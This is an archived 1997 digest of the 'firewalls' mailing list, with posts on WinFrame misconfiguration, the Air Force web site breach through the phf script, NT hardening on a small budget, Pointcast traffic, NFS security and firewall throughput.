(8.7.1-lists/Lists-960417-1) id BAA03091 for firewalls-outgoing; Wed, 8 Jan 1997 01:18:51 -0800 (PST) Received: from mhaaf.inhouse.compuserve.com (mhaaf.inhouse.compuserve.com [149.174.64.79]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA02989 for ; Wed, 8 Jan 1997 01:18:12 -0800 (PST) Received: from notes2.compuserve.com (cserve-aagw2.notes.compuserve.com [149.174.221.199]) by mhaaf.inhouse.compuserve.com (8.6.9/8.6.12) with SMTP id FAA08289.; Wed, 8 Jan 1997 05:43:01 -0500 Received: by notes2.compuserve.com (IBM OS/2 SENDMAIL VERSION 1.3.17/2.0) id AA3746; Wed, 08 Jan 97 04:17:50 -0500 Message-Id: <9701080917.AA3746@notes2.compuserve.com> Received: by External Gateway (Lotus Notes Mail Gateway for SMTP V1.1) id 33EB2F0BAA9F00004125641900310EB1; Wed, 8 Jan 97 04:17:41 To: darren cromer Cc: "'xavier fauquet'" , "'les @tracker.demon.co.uk'" , "'firewalls @greatcircle.com'" From: "massimo.cotrozzi" Date: 8 Jan 97 10:04:10 Subject: RE: Using Remote Workstation as Hole?? Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >On Mon, 6 Jan 1997 00:49:13 +0100, you wrote: >>Could someone points me to a site explaining me what is >>Winframe ? > >I think ... http://www.cytrix.com ? > >Winframe is a remote processing system which allows PC clients to run server >applications on a Windows system rather than using their own processing >power. > >I think. > >...Les... > One very nice hole of poor ( common ) installation of Win Frame is that if you let people using browsers ( say nt ie 2 ) on the server side of the connection they just can "browse" an executable ( say winfile ) and ... voila' pop-up a window browsing the server from the client .... ( This one is just a few hit away on your keyboard ) Massimo Cotrozzi Arthur Andersen - Computer Risk Management Computer Security Senior Consultant Via della Moscova 3, 20121 Milano Tel. ++ 39-2-290371 From firewalls-owner Wed Jan 8 02:59:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA10986 for firewalls-outgoing; Wed, 8 Jan 1997 02:51:50 -0800 (PST) Received: from ram-exch-ns1.ramstein (ram-exch-ns1.ramstein.af.mil [132.25.130.19]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA10979 for ; Wed, 8 Jan 1997 02:51:38 -0800 (PST) Received: by ram-exch-ns1.ramstein with Microsoft Exchange (IMC 4.0.837.3) id <01BBFD5A.65422BE0@ram-exch-ns1.ramstein>; Wed, 8 Jan 1997 11:52:17 +0100 Message-ID: From: Franke Albert 2 Lt USAFE CSS/SCBS To: "'firewalls@GreatCircle.com'" Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 11:52:29 +0100 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am responsible for securing (as well as I can) a DEC Alpha running Windows NT 4.0 and Internet Information Server as our WWW Server. It is sitting as a node on our LAN and everyone in the world can access it. I want a program that I can run on it that will allow/disallow blocks of IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but not as necessary) it to keep detailed logs. I have heard of O'Reiley's WebSite, but I don't know if this will do. I do not have funding for an expensive firewall machine, and it is impracticle to add routers into our LAN. Please help if you have any suggestions. Thanks. albert.franke@ramstein.af.mil Albert E. Franke, 2Lt, USAF OIC, USAFE Web Tech Support 480-7905 From firewalls-owner Wed Jan 8 03:14:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA11282 for firewalls-outgoing; Wed, 8 Jan 1997 03:08:29 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA11274 for ; Wed, 8 Jan 1997 03:08:19 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id fa137831 for ; Wed, 8 Jan 1997 12:07:48 +0100 Received: by ppp52.sbbs.se with Microsoft Mail id <01BBFD5C.41D55860@ppp52.sbbs.se>; Wed, 8 Jan 1997 12:05:36 +0100 Message-ID: <01BBFD5C.41D55860@ppp52.sbbs.se> From: Sebastian Stache To: "'patton@sysnet.net'" Cc: "'Firewalls (inet/GreatCircle)'" Subject: RE: Air Force Web Site Hacked Date: Wed, 8 Jan 1997 12:05:34 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I fully agree. At the same time I'm relieved, since it means we're not experiencing anything magical. ---------- From: Matthew Patton[SMTP:patton@sysnet.net] Sent: den 5 januari 1997 00:50 To: Sebastian Stache Subject: Re: Air Force Web Site Hacked >Or are there html >specific inherent weaknesses not necessarily in the protocol but in the anchient and poor setups used by most casual webadmins. Not 1 week before the incident I urged ASSIST (the military pseudo equiv of CERT) to start beating the drum about patheticly insecure websites. People routinely leave test-cgi with all it's niceties left available. Did they have FTP? Probably. It is appalling how little the 'network professionals' really know about their systems, host and network security. I thought the Pentagon could command better. I'm reminded daily that this isn't so, whether it be military folk or contractors. From firewalls-owner Wed Jan 8 04:14:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA13734 for firewalls-outgoing; Wed, 8 Jan 1997 03:53:53 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA13710 for ; Wed, 8 Jan 1997 03:53:25 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id oa137840 for ; Wed, 8 Jan 1997 12:52:59 +0100 Received: by ppp52.sbbs.se with Microsoft Mail id <01BBFD62.90C9FEC0@ppp52.sbbs.se>; Wed, 8 Jan 1997 12:50:46 +0100 Message-ID: <01BBFD62.90C9FEC0@ppp52.sbbs.se> From: Sebastian Stache To: "'Firewalls (inet/GreatCircle)'" Cc: "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'" Subject: Re: Re: NCSA != NCSC Date: Wed, 8 Jan 1997 12:50:35 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Wilner informed me that: > Everything except boot-up depends upon the O/S. Nothing is below the "O/S > layer," nor does one speak of such a layer unless one intends "application as well as > layer" and doesn't know an application from an O/S, nor can a single byte be > sent or retrieved over a device (networked or otherwise) unless an O/S is > relied upon, nor can a single access to memory, disk, or what-have-you be and more. This is all quite surprising to me. Even though I like to do so when I'm moody, it's not common practise to refer to MS Windows 3 as an application. Most people would call it an (however able or not) Operating System. And yet, Windows 3 is in every way running on top of DOS. With Windows 95, Microsoft has tried to make it less appearant that DOS is still required. They even remap the video adapter's base address during boot, so as to hide the familiar DOS black-screen. In fact, Microsoft in some ways tries to convince their customers that the windowed environment is nothing but an alternate shell (GUI) to the operating system. To this end, you can choose to start WITHOUT activating the "GUI" by putting a statement "BootGUI=0" in a configuration file. This will render you a text-only shell which looks very much like a DOS-prompt. No wonder, it *is* a DOS-prompt (in almost every detail equivalent to DOS version 7), and nothing else. You don't have long-filename support, you don't have any network facilities, you can't even use your printers. Unless you type "win", to start Windows 95. As a matter of interest, this is exactly what happens if you change the "BootGUI=0" to "BootGUI=1" - "win" is inserted into the command queue after all other statements in Autoexec.bat has been executed. Now suppose I wanted to use Drivespace, an MS technique to compress harddisks on the fly. Or even better, Stacker, a 3rd- party equivalent. Either of these would install themselves BELOW Windows 95 (and even more interestingly, in some respects even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS). To Windows 95 (and to DOS), the compression activities would be transparent, ie Windows would not *know* about them. Which of course is the whole point. I don't think there's any point in mentioning utilities that halt the computer when a virus is detected, or when battery status is low, or when the Debug-mode button is pressed, or when a source-routed packet arrives. From firewalls-owner Wed Jan 8 04:59:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA16306 for firewalls-outgoing; Wed, 8 Jan 1997 04:49:35 -0800 (PST) Received: from lab58-12.ims.advantis.com (pony-express.ims.advantis.com [192.231.11.167]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA16289 for ; Wed, 8 Jan 1997 04:49:19 -0800 (PST) Received: (from hfarkas@localhost) by lab58-12.ims.advantis.com (8.6.9/95.10.11) id HAA21439; Wed, 8 Jan 1997 07:46:01 -0500 Received: from d5664655.ims.advantis.com(164.120.51.69) by lab58_12 via smap (V1.3) id sma028861; Wed Jan 8 07:45:55 1997 Received: by gandalf.ims.advantis.com (8.6.9/950921) id HAA27475; Wed, 8 Jan 1997 07:56:33 -0500 Date: Wed, 8 Jan 1997 07:56:33 -0500 (EST) From: "Henry W. Farkas" To: "Starkweather, Mike" cc: "'firewalls@GreatCircle.COM'" Subject: Re: Pointcast In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 7 Jan 1997, Starkweather, Mike wrote: > I am wondering how the members of this mail list have handled the > flood of traffic generated by Pointcast. It has buried our firewall > (Tis Toolkit) with the huge number of requests it generates. Their > I-Server seems to help some but not as much as I had hoped. For starters, you might ask everyone to update on a limited schedule, customized schedule, or manually: that is, only when the update button is pressed. We had the same problem. It turns out that most people simply did not understand the implications of the "all day schedule" option, which claims to be "best for direct internet connections". So, that's what many people chose. Simply informing them helped quite a bit, but we are still considering getting our own Pointcast server. Partly because there is an "early morning slam" on our firewalls, caused by a flood of people coming in, updating Pointcast and reading Dilbert.... =============================================================================== Outside of a dog, a book is a man's best friend. Inside of a dog, it's too dark to read. PGP fingerprint AA D0 F5 44 C1 8C 11 52 - B3 80 34 1C CE 38 EC 53 From firewalls-owner Wed Jan 8 05:14:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA17135 for firewalls-outgoing; Wed, 8 Jan 1997 05:02:40 -0800 (PST) Received: from hp01.vak12ed.edu (hp01.vak12ed.edu [141.104.150.251]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA17126 for ; Wed, 8 Jan 1997 05:02:22 -0800 (PST) Message-Id: <199701081302.FAA17126@miles.greatcircle.com> Received: by hp01.vak12ed.edu (1.37.109.20/16.2) id AA126788459; Wed, 8 Jan 1997 08:00:59 -0500 From: "W.C. Epperson" Subject: Re: To Firewall or Not to Firewall? To: cwlim@ncs.com.sg (Henry Lim Chee Wee) Date: Wed, 08 Jan 1997 8:00:59 EST Cc: firewalls@greatcircle.com In-Reply-To: <32D2F4C6.5DA5@ncs.com.sg>; from "Henry Lim Chee Wee" at Jan 08, 97 9:13 am Reply-To: epperson@vak12ed.edu X-Mailer: Elm [revision: 109.18] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Henry could of sed: > > IMHO, a firewall is necessary as long as you are not running a > standalone web server with sole access to the Internet. O'Reiley's > WebSite is an application program running over a largely insecure > OS platform that will still allow the purposeful prankster to ruin > your show for a laugh. > Sigh. All together now: Step 1: risk assessment Step 2: security policy Step 3: implementation (including firewall if needed) Remember the old cartoon with the caption "You guys start coding and I'll go up and see what they want"? -- W.C. Epperson "I have great faith in fools. Senior SE Self-confidence, my friends call it." Information Security Officer --Edgar Allan Poe-- DBA Emeritus Curmudgeon-for-Life Virginia Dept. of Education epperson@pen.k12.va.us From firewalls-owner Wed Jan 8 05:30:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA15502 for firewalls-outgoing; Wed, 8 Jan 1997 04:38:17 -0800 (PST) Received: from NUHUB.DAC.NEU.EDU (nuhub.dac.neu.edu [129.10.1.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA15472 for ; Wed, 8 Jan 1997 04:38:00 -0800 (PST) From: JOHNSON@neu.edu Received: from neu.edu by neu.edu (PMDF V4.3-7 #11963) id <01IDYNDRCOUO99DTTA@neu.edu>; Wed, 8 Jan 1997 07:37:33 EST Date: Wed, 08 Jan 1997 07:37:33 -0500 (EST) Subject: Firewall throughput measurements. To: firewalls@GreatCircle.com Message-id: <01IDYNDREAPU99DTTA@neu.edu> X-Envelope-to: firewalls@GreatCircle.com X-VMS-To: IN%"firewalls@GreatCircle.com" X-VMS-Cc: JOHNSON MIME-version: 1.0 Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [decloack] I remember sometime back there were firewall throughput questions concerning what happens if a firewall box is used with high speed links on both sides. In my case I'm thinking 4 or 16 mb token ring on one side and similar links on the other or TR to Ethernet or Ethernet to Ethernet. The numbers I've seen are measured with a T1 on one side and an Ethernet on the other. In this case the T1 is the throttle and you expect a certain traffic rate. But it was unknown back then what happens in the other cases mentioned above. No I expect that there will be a delay more sigificant than that of a router. A firewall isn't a router; it's a firewall. A great many firewall functions happen at layer 7 while strict routing is a layer 3 issue. So there's more software to plow through generally speaking in a firewall. And I'm sure the numbers will depend on just how much firewalling is going on. Has anybody done any measurements of what happens when a firewal is used between two high speed links? I'd be very interested in numbers or pointers to same. Thanks. Chris J. NU [recloak] ============================================================================ Chris Johnson Internet: johnson@nuhub.dac.neu.edu Assistant Director, Systems BITNET: defunct Division of Academic Computing Voice: 617.373.3300 Northeastern University, 39RI FAX: 617.373.8600 360 Huntington Ave. 50% of all doctors graduated Boston, MA. U.S.A. 02115 in the lower half of the class ============================================================================ From firewalls-owner Wed Jan 8 05:49:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA16530 for firewalls-outgoing; Wed, 8 Jan 1997 04:52:37 -0800 (PST) Received: from gateway.superonline.net (gateway.superonline.net [194.242.73.254]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA16465 for ; Wed, 8 Jan 1997 04:52:07 -0800 (PST) Received: by gateway.superonline.net; (5.65v3.2/1.3/10May95) id AA12393; Thu, 9 Jan 1997 14:52:47 +0300 Received: by postman.superonline.net with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5) id <01BBFD73.41575750@postman.superonline.net>; Wed, 8 Jan 1997 14:50:14 +0200 Message-Id: From: =?iso-8859-1?Q?=22A=2E_=D6mer_K=F6ker=22?= To: "'Firewalls@GreatCircle.COM'" , "'Matthew Patton'" Subject: RE: USAF: how it was hacked Date: Wed, 8 Jan 1997 14:50:13 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Interestingly enough this specific hole was described in detail on the latest 2600mag. =20 now you know they will start reading it... >---------- >From: Matthew Patton[SMTP:patton@sysnet.net] >Sent: 08 Ocak 1997 =C7ar=FEamba 01:09 >To: Firewalls@GreatCircle.COM >Subject: USAF: how it was hacked > >No, this isn't about cdrom based web content. > >Really quite anticlimatic. The infamous phf script was left active on=20 >the server and was how they got in. Root, the whole 9 yards. > >What's really funny is that no more than a week prior to the incident, = I=20 >suggested to ASSIST (the military's equiv of CERT, and now financial=20 >sponsor of same) that in light of the minor poking around I did on a=20 >handful of military web sites, that they needed to get the word out to=20 >admins because so many servers were in a high state of misconfiguration = >and just waiting to be exploited. 7 days later, boom!! > >I'm not sure on what grounds people place so much trust in the military = >to do things right with respect to host and network security. I'm sure = >there are segments that do a damn fine job, but seeing the abject lack = of=20 >skills and knowledge in the Pentagon area makes me a mite bit skeptical = >and not a little ashamed. It's a wonder we don't see high profile=20 >exploits on a routine basis. Don't get me wrong, the private sector=20 >doesn't have their act together on many fronts as well. > >Now hopefully the thread can die in peace. > From firewalls-owner Wed Jan 8 05:53:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA18774 for firewalls-outgoing; Wed, 8 Jan 1997 05:40:01 -0800 (PST) Received: from ultra1.dreamscape.com (ultra1.dreamscape.com [206.64.128.7]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA18760 for ; Wed, 8 Jan 1997 05:39:41 -0800 (PST) Received: from bertha (sc21.dreamscape.com [206.114.183.214]) by ultra1.dreamscape.com (8.8.4/8.8.4) with SMTP id IAA04884 for ; Wed, 8 Jan 1997 08:40:19 -0500 (EST) Message-ID: <32D3A3BF.5D36@dreamscape.com> Date: Wed, 08 Jan 1997 08:40:15 -0500 From: "Steven E. Matkoski" Reply-To: uscny8hb@ibmmail.com Organization: Blue Cross Blue Shield of CNY X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: internal filtering router - filter config? References: <199701080648.WAA21235@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest wrote: > > In your external router you'd block any ICMP traffic going back and > forth, as well as any packets bearing one of your internal IP addresses, > as a source address, especially if these are going INTO your protected > network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill > any ports that your users will not be using, andl leave just mail, web, > ftp, etc. > > ricardo > ralvarado@avantel.com.mx > Thanks, I also read that you could block source-routed packets there, also. If I am using a cisco router, how does on go about this? or can I get a location for documentation. Thanks! -steve. matkoski@dreamscape.com From firewalls-owner Wed Jan 8 06:16:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20614 for firewalls-outgoing; Wed, 8 Jan 1997 06:08:53 -0800 (PST) Received: from nucleus.com (nucleus.com [199.45.65.129]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA20604 for ; Wed, 8 Jan 1997 06:08:42 -0800 (PST) Received: from geo-x.com (geo-x.com [199.45.65.239]) by nucleus.com (8.8.4/8.8.4) with ESMTP id HAA11956 for ; Wed, 8 Jan 1997 07:08:45 -0700 (MST) Received: from mail.geo-x.com (mail-ppp.geo-x.com [192.168.1.2]) by geo-x.com (8.6.12/8.6.12) with ESMTP id HAA22440 for ; Wed, 8 Jan 1997 07:05:32 -0700 Received: from tstas ([192.2.2.34]) by mail.geo-x.com (8.6.12/8.6.12) with SMTP id HAA12021 for ; Wed, 8 Jan 1997 07:08:22 -0700 Date: Wed, 8 Jan 1997 06:59:10 -0700 (MST) From: Tom Szucs X-Sender: tas@tstas To: firewalls@greatcircle.com Subject: NFS Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What sort of security issues revolve around running NFS on a network ? Can filesystems be exported securely to a specific host, provided that we can control routes which would prevent spoofed IP addresses from being able have any data routed back correctly ? We are running direct ethernet connections as well as ATM PVCs. Any assistance would be appreciated and can be sent to me directly. I can post highlights or key points back to the group. Thanx in advance. Tom Szucs, Geo-X Systems Ltd. From firewalls-owner Wed Jan 8 06:29:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21285 for firewalls-outgoing; Wed, 8 Jan 1997 06:17:04 -0800 (PST) Received: from ncept.pt.nce.sita.int (ncept.pt.nce.sita.int [57.7.6.251]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA21228 for ; Wed, 8 Jan 1997 06:16:36 -0800 (PST) Received: from pc_ptdv.pt.nce.sita.int by ncept.pt.nce.sita.int (8.7.3/SitaNet-1.4) id PAA21833; Wed, 8 Jan 1997 15:16:38 +0100 (MET) Date: Wed, 8 Jan 97 15:16:05 PST From: Denis Valois Subject: Re: Firewalls-Digest V6 #8 To: Firewalls@GreatCircle.COM, michael dreves X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1 Content-Transfer-Encoding: 8BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Cher Michael, Comme tu peux le constater, c'est plutôt désagréable de ne pouvoir comprendre un message affiché. À l'avenir, pourrais-tu composer tes messages dans un dialecte compréhensible pour tous, ou alternativement envoyer les-dits messages aux seuls destinataires légitimes. Merci d'avance de ta compréhension et de ton civisme, Denis Valois Sécurité informatique SITA (Société Internationale de Télécommunications Aéronautiques) On Wed, 08 Jan 1997 10:16:14 +0100 michael dreves wrote: >Hej søde sus, > >her kommer flemmings nye e-mail....der er faktisk tale om to addresser, >som vi skal proeve: > >drc@drc.baku.az (Danish Refugee Council. >fdr@drc.baku.az (formentelig flemming) > > >kh. > >-- michael dreves (MD113-RIPE), System Consultant > Berendsen Data, Phone +45-39577300, Fax +45-39577302 > Key fingerprint = 01 99 2B 6F F1 2E 47 4D 87 6D 98 55 91 42 F8 4D > From firewalls-owner Wed Jan 8 06:49:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22304 for firewalls-outgoing; Wed, 8 Jan 1997 06:30:55 -0800 (PST) Received: from radmail.rad.co.il (radmail.rad.co.il [192.114.26.219]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA22244 for ; Wed, 8 Jan 1997 06:30:25 -0800 (PST) Received: from radguard.com ([192.114.26.210]) by radmail.rad.co.il (post.office MTA v1.9.3 ID# 0-12126) with SMTP id AAA18351 for ; Wed, 8 Jan 1997 16:31:57 +0200 Received: by radguard.com (4.1/SMI-4.1) id AA28221; Wed, 8 Jan 97 16:30:34 IST Received: from elgamal.radguard.co.il(192.114.33.2) by gatekeeper.radguard.com via smap (V1.3) id sma028218; Wed Jan 8 16:30:14 1997 Received: from rosebud (boaz.radguard.com) by elgamal.radguard.com (4.1/SMI-4.1) id AA22671; Wed, 8 Jan 97 16:29:12 IST Message-Id: <32D3AED8.4DB7@queenstown.org> Date: Wed, 08 Jan 1997 16:27:36 +0200 From: mike X-Mailer: Mozilla 3.0 (Win95; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: FW-1 hacked? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all Does anyone know if FW-1 was ever hacked? From firewalls-owner Wed Jan 8 07:01:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22726 for firewalls-outgoing; Wed, 8 Jan 1997 06:42:52 -0800 (PST) Received: from mail1.acccorp.com ([204.124.88.54]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA22710 for ; Wed, 8 Jan 1997 06:42:39 -0800 (PST) Received: from ccMail by mail1.acccorp.com (IMA Internet Exchange 2.02 Enterprise) id 2D3B3AC0; Wed, 8 Jan 97 09:48:12 -0500 Mime-Version: 1.0 Date: Wed, 8 Jan 1997 09:36:47 -0500 Message-ID: <2D3B3AC0.@acccorp.com> From: KBarlow@acccorp.com (Ken Barlow) Subject: Re: Pointcast To: "'firewalls@GreatCircle.COM'" , "Starkweather; Mike" Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We too had this problem. We bent to the will of Pointcast and purchased the server software, and it doesn't work as advertised. It's buggy, hard to configure, many unpublished problems (nevertheless known to some ppl in Customer Service) It did reduce traffic though. We also shutdown the pointcast sites from every internal machine except the pointcast server. I find it's one of those subjects that costs alot and produces _no_ benefit for the company. Regards, Ken B. ACC Long Distance ______________________________ Reply Separator _________________________________ Subject: Pointcast Author: "Starkweather; Mike" at Internet Date: 1/7/97 1:29 PM I am wondering how the members of this mail list have handled the flood of traffic generated by Pointcast. It has buried our firewall (Tis Toolkit) with the huge number of requests it generates. Their I-Server seems to help some but not as much as I had hoped. If this is the wrong place for this question please redirect me. Mike Starkweather Anheuser-Busch From firewalls-owner Wed Jan 8 07:14:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23930 for firewalls-outgoing; Wed, 8 Jan 1997 07:06:36 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA23909 for ; Wed, 8 Jan 1997 07:06:23 -0800 (PST) Message-Id: <199701081506.HAA23909@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A75B878800D4; Wed Jan 08 11:03:55 1997 From: "Jamie Thain" To: "Franke Albert 2 Lt USAFE CSS/SCBS" , "'firewalls@GreatCircle.com'" Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 11:02:14 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank, I might refer your captain to the hacking of the af site that happened a week ago, and there might be some funding appear. NT properly secured can take some licks, but if it were moi, I would dig up an old 486 with a couple of network cards and put a Linux machine with FWTK in front of it. You must have a UNIX person around. I have to pay the consulting time, and it normally costs me about $1,000 per configuration session, but the software is free. But, Do all that you can to secure the NT machine. 1. Put two network cards in the machine, one inside and one out, and disable the IP routing. 2. Disable the Bindings for Wins to Workstation, Server and NetBios in the bindings to the OUTSIDE card. 3. Under the TCP/IP protocol - Properties - Advanced select Enable Security, then configure the security and allow only TCP port 80 if you are serving Web only. Add other ports for the ports you are serving. 4. Rename the Administrator account to something else like BigMachineBoss, or even better, Steve Smith (no reference to roll). 5. Turn on Auditing. 6. Put the WebServer entirely on a separate drive and give access for the Web server only to that drive. 7. Check the eventvwr security log often. 8. Go to http://www.somarsoft.com and read through the NT security faq. This is just a start, and other I am sure will kick in... regards:jamie From firewalls-owner Wed Jan 8 07:34:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA24113 for firewalls-outgoing; Wed, 8 Jan 1997 07:11:04 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA24092 for ; Wed, 8 Jan 1997 07:10:48 -0800 (PST) Message-Id: <199701081510.HAA24092@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A8517E39002A; Wed Jan 08 11:08:01 1997 From: "Jamie Thain" To: "darren cromer" , "massimo.cotrozzi" Cc: "'xavier fauquet'" , "'les@tracker.demon.co.uk'" , "'firewalls@greatcircle.com'" Subject: Re: Using Remote Workstation as Hole?? Date: Wed, 8 Jan 1997 11:06:20 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Massimo, You should be able to run Winfile.exe on you winframe and the users should not be able to cause damage. You should not have to use a browser to get there. The idea is to secure the central computer so a single user can use the OS without damaging it. Although I know I can think of ways to damage it, and I am sure students would as well, you can take away most rights from the client of any importance. It is difficult however to keep them from filling the disk with unwanted files if they have write rights to any directory, as NT does not have a native disk auditor. regards:jamie ---------- > From: massimo.cotrozzi > To: darren cromer > Cc: 'xavier fauquet' ; 'les@tracker.demon.co.uk'; 'firewalls@greatcircle.com' > Subject: RE: Using Remote Workstation as Hole?? > Date: Wednesday, January 08, 1997 6:04 AM > > > > >On Mon, 6 Jan 1997 00:49:13 +0100, you wrote: > >>Could someone points me to a site explaining me what is > >>Winframe ? > > > >I think ... http://www.cytrix.com ? > > > >Winframe is a remote processing system which allows PC clients to run server > >applications on a Windows system rather than using their own processing > >power. > > > >I think. > > > >...Les... > > > > > > One very nice hole of poor ( common ) installation of Win Frame is that if you > let > people using browsers ( say nt ie 2 ) on the server side of the connection they > just > can "browse" an executable ( say winfile ) and ... voila' pop-up a window > browsing the server from the client .... > ( This one is just a few hit away on your keyboard ) > > Massimo Cotrozzi > > Arthur Andersen - Computer Risk Management > Computer Security Senior Consultant > Via della Moscova 3, 20121 Milano > Tel. ++ 39-2-290371 From firewalls-owner Wed Jan 8 09:23:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA01010 for firewalls-outgoing; Wed, 8 Jan 1997 08:47:04 -0800 (PST) Received: from gatekeeper.mcimail.com (gatekeeper.mcimail.com [192.147.45.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA00961 for ; Wed, 8 Jan 1997 08:46:36 -0800 (PST) Received: from mailgate.mcimail.com (mailgate.mcimail.com [166.40.135.3]) by gatekeeper.mcimail.com (8.6.12/8.6.10) with SMTP id QAA08376; Wed, 8 Jan 1997 16:42:58 GMT Received: from mcimail.com by mailgate.mcimail.com id ae29880; 8 Jan 97 16:47 WET Date: Wed, 8 Jan 97 11:46 EST From: Peter Ngo To: drexx , David Wee Cc: firewalls Subject: Re[2]: FW-1 throughput? Etc. Message-Id: <34970108164643/0007044148PJ2EM@MCIMAIL.COM> X-MB-Info: Serial #: 191-30-2807 VERSION: 2.01H Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, 1. There is a good white paper of Firewall-1 Performance Testing results based on Sun Ultra 170, Sparc5, and X86 with Solaris 2.5 @ http://CheckPoint.com 2. It does support VPN. There is a VPN patch. 3. Check the home page http://checkpoint.com. Hope this would help, Peter Ngo ______________________________ Reply 